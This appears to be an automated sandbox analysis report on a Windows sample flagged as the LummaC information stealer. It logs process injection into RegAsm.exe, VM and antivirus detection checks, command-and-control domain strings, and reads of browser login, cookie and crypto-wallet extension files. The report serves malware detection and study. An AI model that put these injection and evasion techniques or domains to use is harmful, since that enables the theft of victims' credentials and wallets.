Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: nlJ2sNaZVi.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: nlJ2sNaZVi.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: nlJ2sNaZVi.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.pdbu source: nlJ2sNaZVi.exe, 00000000.00000002.2051982616.0000000001022000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: $]q8C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.pdb source: nlJ2sNaZVi.exe, 00000000.00000002.2052624762.0000000003034000.00000004.00000800.00020000.00000000.sdmp

Source: nlJ2sNaZVi.exe

Static PE information: 0xBE2D6ACE [Sun Feb 8 18:58:22 2071 UTC]

Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline"
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline"			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042B319 push ebx; iretd		5_2_0042B31A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00440E2B push 0000007Bh; iretd		5_2_00440F00

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.dll

Jump to dropped file

Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: nlJ2sNaZVi.exe PID: 5700, type: MEMORYSTR

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Memory allocated: 2CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Memory allocated: 2F90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Memory allocated: 2CD0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.dll

Jump to dropped file

Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe TID: 5024	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe TID: 6844	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1892	Thread sleep time: -120000s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 00000005.00000002.2209520966.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: nlJ2sNaZVi.exe, 00000000.00000002.2051982616.0000000001022000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_00437A80 LdrInitializeThunk,

5_2_00437A80

Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.nlJ2sNaZVi.exe.2e70000.0.raw.unpack, Engineers.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
Source: 0.2.nlJ2sNaZVi.exe.2e70000.0.raw.unpack, Engineers.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
Source: 0.2.nlJ2sNaZVi.exe.2e70000.0.raw.unpack, Engineers.cs	Reference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Compiles code for process injection (via .Net compiler)

Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe

File written: C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.0.cs

Jump to dropped file

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: nlJ2sNaZVi.exe, 00000000.00000002.2052855013.0000000003F99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tamedgeesy.sbs
Source: nlJ2sNaZVi.exe, 00000000.00000002.2052855013.0000000003F99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: relalingj.sbs
Source: nlJ2sNaZVi.exe, 00000000.00000002.2052855013.0000000003F99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: rottieud.sbs
Source: nlJ2sNaZVi.exe, 00000000.00000002.2052855013.0000000003F99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: brownieyuz.sbs
Source: nlJ2sNaZVi.exe, 00000000.00000002.2052855013.0000000003F99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: explainvees.sbs
Source: nlJ2sNaZVi.exe, 00000000.00000002.2052855013.0000000003F99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ducksringjk.sbs
Source: nlJ2sNaZVi.exe, 00000000.00000002.2052855013.0000000003F99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: thinkyyokej.sbs
Source: nlJ2sNaZVi.exe, 00000000.00000002.2052855013.0000000003F99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: repostebhu.sbs
Source: nlJ2sNaZVi.exe, 00000000.00000002.2052855013.0000000003F99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: netwrokenb.cyou

Writes to foreign memory regions

Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 451000	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 9F5008	Jump to behavior

Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBEB5.tmp" "c:\Users\user\AppData\Local\Temp\v0t1l0co\CSC65BF410C392B47AC8396E849E0F657FD.TMP"	Jump to behavior

Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Queries volume information: C:\Users\user\Desktop\nlJ2sNaZVi.exe VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: RegAsm.exe, 00000005.00000002.2210105512.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
